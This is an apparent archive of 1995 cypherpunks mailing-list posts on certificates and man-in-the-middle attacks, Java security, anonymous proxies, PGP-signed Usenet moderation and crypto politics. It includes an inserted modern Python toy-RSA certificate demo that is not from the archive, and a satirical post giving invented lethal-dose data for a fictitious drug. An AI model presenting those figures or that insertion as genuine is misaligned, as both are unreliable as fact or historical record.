<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 9 Oct 95 13:35:28 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Crypto's Role in Evil?
In-Reply-To: <ac9dd5a302021004dfe5@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951009161648.24837C-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 8 Oct 1995, Timothy C. May wrote:

> liberalism" and law-based "social justice" policies. My personal view is
> that an ever-shrinking elite (20%, then 10%, then 2%, ...) will dominate
> high-value transactions, with the mass of humanity offering little or
> nothing worth buying. Just my view.)

I hear this from commies all the time but I don't have to take it from a 
fellow libertarian.  I expect commies to be economically illiterate.

The notion that the unskilled have nothing to sell is the same argument 
as saying that poor, third-world nations have nothing to sell (and 
should protect their markets via tariffs).  Commies these days (The End 
of Work - by anti technologist Rifkin) make the same claim.  This implies 
that wants are limited.

Most economists operate on the assumption that wants are unlimited.  
Certainly I do.

In addition to becoming skilled, the unskilled can supply personal 
services that we as primates will still like to have supplied by people.  
If "magically" supplied goods make goods cheap, labor becomes dearer by 
definition.

Some people seem to think that the theory of comparative advantage means 
that the person/nation with the lesser comparative advantage can't do 
anything.  What it really means is that the more efficient concentrate on 
those things they are more efficient at while the less efficient 
concentrate on less valued tasks which the more efficient could do better 
if it was worth it to do so but it's not.

DCF

"Who notes that waitrons of the present day have a much higher real 
income than physicians of the 19th century."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 9 Oct 95 13:33:21 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Crypto's Role in Evil?
In-Reply-To: <ac9eafac0202100433c6@[205.199.118.202]>
Message-ID: <199510092035.QAA01945@homeport.org>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:

| this being a strong cryptography group, this is a good time to mention to
| newcomers to the list that the book "Snow Crash," by Neal Stephenson,
| offers a wickedly satirical look at a possible future for America.

	Speaking of Stephenson, he views the Snow Crash future as not
a particularly bad one.  Sure, some of the companies are evil, but
they are not so evil, or as powerful, as governments have been this
century.

	Also, Klaus, I'll offer up the following data on
Iboviroxinase-D.  LD-50 of 490mg in 20 male subjects aged 16-28.
Subjects were paid volunteers.  Releases included in study.  Onset
time of less than one minute from administration of last dose.  Doses
were administered intravenously every 4 minutes as 50mg of
Iboviroxinase-D in saline solution.  Complete study will be encrypted
to you on the payment of $35,000 to our account.

	While medical data based on various studies will probably
become available, there will also be a value to forging such studies
(after all, how is Tim to know?)  (It's worth a bit of time for $35,000
to see if Tim can tell the difference.)  Also, expect police to be
engaging in undercover work to try to find people who buy these
things.

	Encryption is not a cure all for criminals.  It makes some
things easier to do, but if the number of crimes drops down to murder,
kidnapping, theft and rape, the police will have the time to track
down people who kidnap 20 people for a toxicity study.  (And good
studies will probably take more people than that; partly because it's
not a refined science, partly because people are so variable.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Sun, 8 Oct 95 23:41:08 PDT
To: crypt-request@cs.aukuni.ac.nz
Subject: PGP Moose anti-spam authentication ready to go
Message-ID: <9510090642.AA41873@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain



Yesterday the PGP Moose Checking Daemon did its
first automatic cancellation. The offending message
lasted less than a second.

For some months I've been working on some scripts
collectively called "the PGP Moose", which are
intended to cryptographically authenticate news
postings, and send notifications or cancellations
when postings fail the authentication. This message
is to announce that the moderators' and users' end
of the software seems to be ready to go, and I'm
looking for testers who have a better and more
complete newsfeed than I to cooperate with running
the cancelling daemon part of it. Both parts are
tested to the best of my ability.

The aim of this software is to monitor the news
postings of moderators of USENET newsgroups, and to
automatically cancel forged messages purporting to
be approved.  This can be extended to the approvals
of individual users to automatically cancel messages
that appear without having been authorised by the
user. This has (obviously) been prompted by the
recent spammings and other events.

This software and protocol is designed around
cryptographic signatures.  The protocol is designed
to allow the use of different signature techniques.
This implementation assumes the use of PGP signatures,
but can be easily modified to use others, such as
the Digital Signature Standard.  PGP was chosen for
its widespread availability around the world.

Basically, there is a script you run which
inserts a special header based on a PGP signature
of the important parts of the article. When an
article arrives at a site running the PGP Moose
Checking Daemon, the existence and correctness
of this special header are checked, and either
someone is notified or the article is cancelled.

PGP, the crux of the cryptographic software, was
written by Phil Zimmermann <prz@acm.org>, who
otherwise has nothing to do with this. The cryptographic
framework was written by me <Greg_Rose@sydney.sterling.com>,
as were the INN news system hooks.

The <A
HREF=http://www.sydney.sterling.com:8080/~ggr/pgpmoose.html>README</A>
is available for browsing, so I won't post it here,
but I will happily send it (or the scripts) to people
who can't get it easily on the Web.

-- 
Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 9 Oct 95 14:47:55 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <ac9ea8f3010210049f44@[205.199.118.202]>
Message-ID: <9510092146.AA28192@alpha>
MIME-Version: 1.0
Content-Type: text/plain



hfinney@shell.portal.com writes:
 > >3) You can set up some sorts of communications tests to "probe" for a
 > >MITM situation, perhaps by passing through "seeded" information (data
 > >taggants?).
 > 
 > I will agree that there are alternatives to certificates.  

I'm a little confused, I guess.  What is it about certificates that
you'll trust with such confidence?  How do you know that the guarantor
of a certificate wasn't spoofed by an MITM attack?  How do you know
that the certificate itself wasn't spoofed?

 > >I don't think it is irrelevant, I just think it's orthogonal to the
 > >issue of whether a certificate for a key<-->entity relationship is
 > >considered to be the key or an adjunct to the key.  I could be wrong,
 > >of course.
 > 
 > The POV I am really arguing against is the one that defines identity to
 > be a key, that states that in communicating with a key you are by
 > definition communicating with the person you have in mind.  The man in
 > the middle attack does not exist because from your point of view the
 > entity at the other end of the communication channel is just the MITM
 > plus the person you think you are talking to.  

I think it's more correct to say that the MITM attack is acknowledged
to be possible, but realistically no more of a threat than in a
certificate model.   And note the "I think", and this warning that I
could be wrong.  (Or I could be an MITM...  bwahahahaha!)

 >                                                    This idea has been
 > expressed many times by other people in this discussion, and it is this
 > which I think is fundamentally flawed and even dangerous because it
 > encourages the use of untested keys.  In fact it seems to define away
 > the question of whether a key is real or fake.

Oh now wait a sec here; I don't think anybody's advocated using
"untested" keys.  It's still perfectly reasonable to establish
networks of reliable information focused on a key.

If I electronically "encounter" Alice and decide to begin a secure
conversation, we initiate a key exchange.  I can then go to as many
already-trusted entities as I like in an attempt to verify that as
many attributes that are claimed to be associated with the key are
really there as I desire.  If Alice wants to buy a widget from me, I
can ask other businesses whether they've ever had problems collecting
from that key.  If I want to buy a widget from Alice, I can ask
friends whether they've gotten good widget from that key.  If I'm
interested in a little e-hanky-panky, I can ask around the sleazier
corners of the net to see whether Alice is the kiss-and-post type.

Somebody's going to have to explain to my thick skull how it is that a
certificate system makes this process any different, fundamentally.  I
mean, it may be that there's more superficial security, but I don't
see where there's any additional risk truly introduced by using the
key itself as a "True Name".  Maybe the real question is, how does a
certificate system give me the confidence that there really is an
"Alice" according to some definition of "really" that satisfies me?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Mon, 9 Oct 95 13:50:47 PDT
To: cypherpunks@toad.com
Subject: Chaum's patents
Message-ID: <Pine.3.89.9510091650.A96856-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


Sorry if this has been stated before, but exactly when do Chaum's first
set of e-cash related patents expire? I looked it up in applied crypto
the last time I had my hands on it and couldn't find the dates. 

How many (and what) patents are there in this field anyway? (don't bother 
with that if it's too long to answer)

TIA

 my visit to Dachau
> Concentration Camp, I saw original lab notebooks of experiments designed
> to increase the survival rate of pilots downed above the cold waters of the
> North Sea. A noble cause.

Well I don't think so. The pilots' missions were to bomb the cities of England.
This was in turn to further the megalomaniac plans of the Fuhrer to create
a European police state under his personal rule with all objectors murdered.

Analysis of the aims of the research must not simply stop at the immediate
result but through to the wider goals towards which the research was 
intended to contribute. In this context we see that the objective was not to
save lives but to destroy them in the furtherance of a plan to enslave the
entire population of Europe. 

spread, 
> easy employment.

I'm not a libertarian, or an anarcho-capitalist.  I do, however, support 
rapid deployment, without restrictions, of strong crypto.  Here's why:

(1) It is impossible to stop these technologies; someone on the list 
recently reminded us that a bright fourteen year old could reproduce the 
basic functionality of PGP in a brief period of time.  The mathematics 
of, say, RSA, are fairly basic.  I think it's unreasonable to outlaw 
multiplication of prime numbers, don't you?

(2) While these technologies allow people to violate the law, I have 
enough faith in humanity to believe that civilization won't collapse as a 
result.  There have always been criminals, and there have always been 
revolutionaries.  Only recently has "The State" been able to suppress 
these forces without maintaining a physical presence.  Crypto merely 
returns us to that default.  

	An example of this is, for example, "What if terrorists are going
	to blow up a big important building, but we don't know which one?"
	Before wiretapping, and even today with groups which insist on 
	physical presence in a secure location for planning, you had to
	infiltrate the group.  This will still work.  LEAs don't like this
	sort of activity because of the inherent risk for the infiltrator.
	That's not a good reason to limit these technologies.

(3) These technologies also allow honest, law-abiding citizens to protect 
themselves from criminals, both within and outside the government.  
Industrial espionage can be defeated through strong crypto, for example.  
J. Edgar Hoover would have been powerless to harass Martin Luther King, 
jr. had MLK had access to strong crypto.


Obviously, these aren't the only reasons to use strong crypto, and 
everybody will almost definitely disagree with them as I've described.  
But it's one answer, anyway.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 9 Oct 95 16:54:56 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <ac9ea8f3010210049f44@[205.199.118.202]>
Message-ID: <199510092353.QAA16167@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


m5@dev.tivoli.com (Mike McNally) writes:
>I'm a little confused, I guess.  What is it about certificates that
>you'll trust with such confidence?  How do you know that the guarantor
>of a certificate wasn't spoofed by an MITM attack?  How do you know
>that the certificate itself wasn't spoofed?

I believe that the certificate wasn't spoofed by an MITM attack because 
the certificate issuing process requires face to face contact with some
proof of identity, in at least one way of doing this.  The certificate
wasn't spoofed because I got the key of the signer through an out of band
mechanism, such as seeing it printed in the newspaper.

The main requirement is to have some contact between Alice and the rest
of the world which doesn't go through the MITM, and the same for Bob.  By
using certificates, this contact only has to be done once (for each of
them).  There is no need for Alice and Bob themselves to have a face to
face meeting, nor for Alice and Charlie, Alice and Dave, Bob and Charlie,
Bob and Dave, Dave and Charlie, etc.  Just the one will suffice.

>I think it's more correct to say that the MITM attack is acknowledged
>to be possible, but realistically no more of a threat than in a
>certificate model.   And note the "I think", and this warning that I
>could be wrong.  (Or I could be an MITM...  bwahahahaha!)

I'm not sure whether this is because you think MITM is so difficult as
to be almost impossible in any model, or whether you think that an MITM
attack is possible in some cases against relatively naive users, but that
certificates won't help at all in that case.

Let me make clear how I would see a MITM attack working.  There are two
main flavors, the permanent and the transitory.  Here is how the
permanent MITM could work.

Alice's ISP provides all of her email services.  She has created and
published a public key, but the ISP has detected this and replaced it
with a fake key.  Everyone who tries to send to her using that key gets
their message decrypted and read by the ISP, then re-encrypted using
Alice's real key and delivered to her mailbox.  This much would be
relatively easy.

But it is not enough.  If Alice gets hold of a good key for Bob, she will
send messages to him using that key.  The ISP can't read those messages.
If she signs them, Bob will notice that the signature doesn't check
against his copy of Alice's key (the one which the ISP has installed in
place of Alice's real one), and the ISP will be caught.

Therefore the ISP is going to have to make sure that every single key
Alice gets is a fake one, one for which the ISP has the secret key.
When Alice gets Bob's key, Charlie's, everybody's, the ISP has to
replace those with fake versions.  Then again it can do its
translate-and-replace trick on messages going in both directions.  This
is obviously a much more difficult task, but if people acquire keys in
limited, stereotyped and automated ways, it could conceivably be done.

With this, what more could trip the MITM up?  Well, if anybody ever
included any keys within the body of a message, those would have to be
detected and substituted.  Even key fragments might have to be handled,
although it is unlikely that this would be noticed.

The biggest threat would be if Alice used a different method to get
someone's keys, her own or anybody's that she communicates with.  She
could use a different ISP or use some "out of band" (off-net) method.
If she went to a key signing party the jig would be up.

Does this mean that the MITM attack is impossible?  Not necessarily.
I'll bet there are plenty of people who only use one ISP (AOL or MSN)
and who have never been to a key signing party.  Maybe they've never
even met someone in real life whom they communicate with on the net.  A
lot of people could fall into this category.

This is where the certificate comes in handy.  A certificated key from a
signer whose key Alice is able to verify out of band will not be
forgeable by the MITM.  Likewise if Alice's key distributed on the nets
is signed by a trusted certificator then other people can have confidence
that there is no MITM involved.  Basically the certificate is a way of
forcing people, at least once, to go around their ISP.  And once is
enough.

Now let me describe the other form of MITM attack, the transitory one.
In this one the attacker doesn't care if he's caught, he just wants to
peek at a few (possibly crucial) messages.  Here again his attack is to
replace Alice's public key in the databases with a bogus one, and to
intercept her communications.  Or maybe he is attacking SSL or some
other protocol where one side sends their public key to the other.
Then it is even easier to send a fake one.  People who trust and use
that key will lose their privacy.

This attack is obviously a lot easier to mount in some contexts.
Again, the use of a certificate should prevent these, and in fact SSL
does use certificated keys.  The MITM will not be able to supply a
certificated key with the name/address information for Alice.
(Netscape currently doesn't check to see whether the name in the key is
valid, so it is not getting much benefit from the use of certificates.
I hope it is clear that abandoning certificates or using ones without
any name or address information would make SSL very unsafe.)

>Oh now wait a sec here; I don't think anybody's advocated using
>"untested" keys.  It's still perfectly reasonable to establish
>networks of reliable information focused on a key.

>If I electronically "encounter" Alice and decide to begin a secure
>conversation, we initiate a key exchange.  I can then go to as many
>already-trusted entities as I like in an attempt to verify that as
>many attributes that are claimed to be associated with the key are
>really there as I desire.  If Alice wants to buy a widget from me, I
>can ask other businesses whether they've ever had problems collecting
>from that key.  If I want to buy a widget from Alice, I can ask
>friends whether they've gotten good widget from that key.  If I'm
>interested in a little e-hanky-panky, I can ask around the sleazier
>corners of the net to see whether Alice is the kiss-and-post type.

What if you just want to talk to her securely?  I asked before what
"attributes" would handle that case, and the answer that at least Tim
gave was that talking to the key is talking to Alice.  I don't buy
that, at least not yet.

(Don't get me wrong - I don't have anything against attributes.  I love
Chaum's pseudonymous credentials.  I'm just worried that unless we have a
foundation of secure communication that the rest of the edifice isn't
going to stand.)

>Somebody's going to have to explain to my thick skull how it is that a
>certificate system makes this process any different, fundamentally.  I
>mean, it may be that there's more superficial security, but I don't
>see where there's any additional risk truly introduced by using the
>key itself as a "True Name".  Maybe the real question is, how does a
>certificate system give me the confidence that there really is an
>"Alice" according to some definition of "really" that satisfies me?

OK, I wrote at length above on how certificates can help against two
forms of MITM attacks.  What do you think?  Maybe it is hard to imagine
a long-term successful MITM attack, but wouldn't you feel uncomfortable
with an SSL which used uncertificated keys?

Hal
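
The certificate check described in the message above, including its point that a verifier which ignores the name in the certificate gains little, as an added example (not part of the original message or of any software it mentions). Toy textbook RSA over fixed Mersenne primes stands in for real signatures; the names, addresses and function names are constructed for illustration.

```python
"""Toy model of certificate checking against key substitution (constructed example).

Textbook RSA over fixed Mersenne primes keeps the block deterministic and
dependency-free. It is NOT secure and only stands in for real signatures.
"""
import hashlib
from dataclasses import dataclass

E = 65537  # public exponent shared by every toy key


def make_key(p: int, q: int):
    """Return (n, d): public modulus and private exponent."""
    return p * q, pow(E, -1, (p - 1) * (q - 1))


def _digest(data: bytes) -> int:
    return int.from_bytes(hashlib.sha256(data).digest(), "big")


def sign(data: bytes, n: int, d: int) -> int:
    return pow(_digest(data), d, n)


def verify(data: bytes, sig: int, n: int) -> bool:
    return pow(sig, E, n) == _digest(data)


@dataclass(frozen=True)
class Certificate:
    name: str        # identity the signer vouches for
    subject_n: int   # subject's public modulus
    signature: int   # signer's signature over name + key


def _to_be_signed(name: str, subject_n: int) -> bytes:
    return name.encode() + b"\x00" + hex(subject_n).encode()


def issue(name: str, subject_n: int, signer_n: int, signer_d: int) -> Certificate:
    sig = sign(_to_be_signed(name, subject_n), signer_n, signer_d)
    return Certificate(name, subject_n, sig)


def check(cert: Certificate, ca_n: int, expected_name: str, check_name: bool = True) -> str:
    """Verify against a CA key obtained out of band, then compare the name."""
    if not verify(_to_be_signed(cert.name, cert.subject_n), cert.signature, ca_n):
        return "bad-signature"
    if check_name and cert.name != expected_name:
        return "name-mismatch"
    return "ok"


def readable_by(recipient_n: int, n: int, d: int, m: int = 0x5EC2E7) -> bool:
    """True if the holder of private key (n, d) recovers m encrypted to recipient_n."""
    return pow(pow(m, E, recipient_n), d, n) == m


# Constructed keys: distinct Mersenne primes 2**k - 1 (trivially factorable).
CA_N, CA_D = make_key(2**521 - 1, 2**607 - 1)        # CA_N is known out of band
ALICE_N, ALICE_D = make_key(2**107 - 1, 2**1279 - 1)
MITM_N, MITM_D = make_key(2**127 - 1, 2**2203 - 1)   # the ISP in the middle


def run_scenarios() -> dict:
    want = "alice@example.org"
    alice_cert = issue(want, ALICE_N, CA_N, CA_D)
    # The CA certifies the ISP as well, but only under the ISP's own name.
    isp_cert = issue("isp@example.net", MITM_N, CA_N, CA_D)
    # A certificate the ISP signs itself, claiming Alice's name.
    self_made = issue(want, MITM_N, MITM_N, MITM_D)
    return {
        "genuine": check(alice_cert, CA_N, want),
        "self-made": check(self_made, CA_N, want),
        "isp cert, name checked": check(isp_cert, CA_N, want),
        "isp cert, name ignored": check(isp_cert, CA_N, want, check_name=False),
    }


if __name__ == "__main__":
    for case, verdict in run_scenarios().items():
        print(f"{case:24} -> {verdict}")
    print("MITM reads mail sent to its own key:", readable_by(MITM_N, MITM_N, MITM_D))
    print("MITM reads mail sent to Alice's key:", readable_by(ALICE_N, MITM_N, MITM_D))
```

Only the last scenario lets the substituted key through: the signature is valid, so a verifier that never compares the certified name with the intended correspondent accepts the middleman's key.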




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 9 Oct 95 17:01:03 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Certificate proposal
In-Reply-To: <199510092316.QAA09588@jobe.shell.portal.com>
Message-ID: <199510092355.QAA29849@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I rather figured there was miscommunication here.


> 
> It occurs to me that perhaps I have been missing a point here when people
> argue that having a "man in the middle" is not that different from
> various forms of secure communication, such as where Bob has multiple
> personalities or is a committee.  I have been taking this to mean that we
> should therefore not worry about MITM attacks, which seems crazy to me.
> 
> Instead perhaps this was meant as a "reductio ad absurdum" argument for
> why MITM attacks cannot be prevented in the scenario where people have no
> out-of-band contact.  Anything which could detect and prevent MITM
> attacks could, by this analogy, detect whether Bob had multiple
> personalities.  Since the latter is obviously impossible, the former must
> be as well.  Hence the problem has no solution and we should not
> waste much time on it.


	My point is not that MITM has no solution and that time should
not be wasted but that context (in many cases out-of-band contact, but
not necessarily) is an important factor when dealing with MITM. A
context-free situation is not a very useful thing to look at when
trying to solve MITM -- MITM should be looked at in context-based
situations.

> 
> I don't fully agree with this but at least it is not as bizarre as the
> first interpretation.
> 
> Hal
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Mon, 9 Oct 95 16:43:16 PDT
To: Kevin L Prigge <cypherpunks@toad.com
Subject: Re: HTTP anon proxy pointers
Message-ID: <199510092356.QAA23573@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:00 PM 10/9/95 -0500, Kevin L Prigge wrote:
>I seem to recall that someone was working on an anonymous http
>proxy a couple months ago. Pointers would be appreciated. Thanks.

We had discussed this at the last Bay Area Cypherpunks meeting (BTW,
when/where is the next??), and came to the conclusion that it would be
technologically simple, but load inefficient, to implement in a large scale
at this point.

The main problem with anonymous http (or telnet, talk, etc) lies in the
sheer amount of information being transferred, and the even larger amount of
noise an anonymous site would have to generate to defeat traffic analysis. A
mail message is usually under a few K, but with these larger systems you
move into the multiple meg realms; to hide a single individual's (ie,)
3K/sec stream, a provider would have to generate many times that in cover
traffic. We can force traffic to the user from network speeds to slow down
to modem speeds, but that doesn't help the inbound crunch at all. Web sites
don't generally generate much inbound traffic, but when coupled with dialups
(such as in my case) this could lead to bad service to the local modem users.

The good news is, with multiple anon redirectors bouncing traffic between
them to further confuse an attacker, the number of users can grow an order
of magnitude without any additional load, since the streams are hiding in
the midst of other streams and far less random cover traffic needs to be
generated.

Software-wise, an anonymous http scheme could be implemented with a standard
proxy server with remote host access restrictions and log analysis tools to
charge the appropriate individuals for their usage (a la anon email postage
stamp rolls). Down the road, cover traffic, ecash payment, encryption, and
other nifty toys can be added.

If anyone on this list is in need of anonymous http right now (even to
tinker with it) I'd be willing to set up a free-use proxy, as long as you
don't bring our server or our pipe to their knees. Mail me (privately if you
wish) with the individual IPs/names of the hosts you'd be coming in from -
no blanket domain names, please, unless they're your own personal network.
If I see enough interest I'll have a proxy up by next week.

Have I missed anything?
--
   Jay Campbell - Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node) 
   edge@got.net   "Shoot the Fruit Loop"            
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 9 Oct 95 17:07:54 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: netscape mail starts java attachments upon get new mail...
In-Reply-To: <199510092305.TAA24544@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.951009165759.13562G-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Oct 1995, Perry E. Metzger wrote:

> 
> "Josh M. Osborne" writes:
> > As far as I know Java apps can only make network connections to the
> > IP address they were loaded from.
> 
> That might be the design, but we know that it is hard to faithfully
> implement very complicated designs.
> 

The design of java is supposed to make analysing for security easier than 
it might be in other similarly sized systems- whether it does this or not 
is something that needs to be checked for carefully. 

The three components that need to be analysed are the class loader, the 
implementation of the JVM, and the code to check network connections. 

Analysing the VM and the class loader should be a simple (hah) matter of 
structural induction (possibly a two step process of converting the vm 
description into a denotational semantics and analysing that, followed by a 
proof that the vm is a faithful implementation of those semantics.)

The networking code is simple to prove safe if the VM and classloader 
can be shown to be safe.

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Mon, 9 Oct 95 17:32:13 PDT
To: cypherpunks@toad.com
Subject: Coming Out Party!
Message-ID: <199510100021.RAA26015@art.net>
MIME-Version: 1.0
Content-Type: text/plain





		        Coming Out Costume Party!!
		         	   @
		             Bryant's Bend	
		

	Our wonderful house at Bryant's Bend in Palo Alto, is 
celebrating (our new housemate) Joyce Fortune's tenth anniversary of 
coming out as a lesbian. She has since become bi and celebrates bi'ness 
with the rest of us here at our veggie co-op.

	Join us in the wonderful celebrations, gaming and frolic.
Come in costume as butch or fem (lingerie is most desired). All uncostumed 
guests will be bounced by our tall african-american femmi bouncer (Go Frankie!). 

The particulars:


	When:   Saturday Night (October 14, 1995)
	Time:   7:00 to late
	Where:	130 Bryant St.
		Palo Alto CA

	What to bring:  Yourselves, a costume, gay music in cd or 
		tape cassette medium, and any erotic foods and drinks
                you might desire...	        

		We will be providing the atmosphere and some 
		non-alcoholic drinks and munchies.... 


	Directions:

	From 101:  
	
		Take the University Exit that heads West. Follow
		University Street until you reach Bryant St.
		Make a right onto Bryant St. and follow it to the 
		end. We are the last house on the left hand side
		and are on the corner of Bryant St. and Palo Alto Way. 
		It's a big tan house with brown trimmings.
	
 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Mon, 9 Oct 95 17:14:01 PDT
To: cypherpunks@toad.com
Subject: Re: Patents etc
Message-ID: <199510100027.RAA24061@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain



>IMHO What's needed is a) a good way of measuring usage and b) a realistic
>attitude on the part of patent holders as to the value of their patents. 
>
>A good example of how not to do it is the current mess that governs the
>music industry (which has very similar problems with copying and incorporation
>of material [sampling] albeit in a context of copyright rather than
>patents). 
>
>Ted Nelson did a lot of work on this for xanadu and his ideas on 
>transcopyright are worth exploring further.

One interesting (but maybe off-topic) facet of client-side applets (a la
Java) is the fact that publishers can define proprietary protocols and file
formats, and change them as often as they want, giving a sort of minimal
protection against casual duplication and re-publishing. With a bit more
work, the formats could make true transclusions efficient and easy to apply,
and help increase the amount of serious/commercial information available to
the public.

This is nothing new, I suppose... Java (from a user point of view) isn't
that much different than IntelligentPad, which from what I understand was
the client system the Xanadu people were working with recently.
--
   Jay Campbell - Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node) 
   edge@got.net   "Shoot the Fruit Loop"            
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Campbell <edge@got.net>
Date: Mon, 9 Oct 95 17:15:16 PDT
To: cypherpunks@toad.com
Subject: Re: netscape mail starts java attachments upon get new mail...
Message-ID: <199510100028.RAA24101@you.got.net>
MIME-Version: 1.0
Content-Type: text/plain


>OBcrypto: in one of the Java papers I saw a reference to use of RSA
>signatures to allow browser users to say things like "I trust Sun
>(or Tim May) to write applets that use Foo not to harm me".  It
>wasn't in the public release of HotJava because of licensing 
>constraints.  Any speculation on whether Netscape will (eventually)
>support that feature?

If this is the case, my big hope is that Netscape doesn't limit /this/ trust
system to a pre-approved set of corporate entities I'll (as a private
individual) have to pay $300 for if I want my apps to do anything more than
bounce faces around a user's screen.

A model allowing multiple entities to put a stamp of approval (possibly with
some sort of hash/checksum to match an app in question against an approval
certificate) /would/ make things easier for the user, though, allowing them
to set up a set of blanket rules instead of pausing and pondering a
particular programmer's trustworthiness every new site he visits... a la
Tim's Dirt Cheap Java Security Approval Company.

Please don't nail me on semantics; I use all above terms loosely.
--
   Jay Campbell - Regional Operations Manager
   -=-=-=-=-=-=-  Sense Networking (Santa Cruz Node) 
   edge@got.net   "Shoot the Fruit Loop"            
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis)
Date: Mon, 9 Oct 95 17:29:54 PDT
To: perry@piermont.com
Subject: Re: java security concerns
Message-ID: <9510100030.AA29195@pepper.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain



>Sendmail is about 29K lines of C code -- not significantly larger by
>my standards -- and has proven nearly impossible to secure.

Good point.

>Sendmail performs a much simpler task and has not proven secure.

I don't necessarily agree. The core java interpreter is simply:
	while (1) {
		get_next_opcode
		switch(x) {
		}
	}

> ... Marcus Ranum has noted that you can't
>trust a program that's bigger than a couple of pages long, and I
>believe he's right.

It's a useful metric. But the concept of trust isn't defined. If
you write in pure Java code (that is no references to any native
methods) we should be able to do much better than that. 

And since Java doesn't have "programs" it just has "classes" and
many of those fit on two pages where does that leave us? Would it
be reasonable to say that if I want to write a Java class I trust
I should keep it under two pages? If I then write another class 
that uses that class, that is also under two pages have I met
the requirement? Can this aggregate four page Java class be trusted?

>As an aside, have you tried breaking your own program? Spend a week on
>it some time. It's usually an educational experience and it breaks you
>out of the mindset you have fixed in for a while.

Many times. 

>As people have found out, it has proven possible to core dump the Java
>interpreter. That means that your implementation has contained flaws
>that potentially permitted people to do unplanned things to the state
>of the interpreter.

I agree.

>By the way, I suggest that Sun should offer a large money prize for
>the first significant security hole found in the Java implementation. It's
>a tiny price to pay for security.

I don't think the lawyers would let us. 

Would anyone be interested in a Java daemon that one could send arbitrary
classes to in an attempt to subvert the runtime? I once thought this would
be a good way to give safe exposure to the system in general. You know sort
of "here's a program that can feed classes to a Java runtime on a system
which is known to have a file X on it. Try to return the contents of X."

It probably wouldn't be too useful beyond that, and it would only validate
the classes you have access to, not necessarily the full set in a release.
(hence my not doing it given its utility only in testing the core runtime)

--Chuck 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 9 Oct 95 17:29:59 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: java security concerns
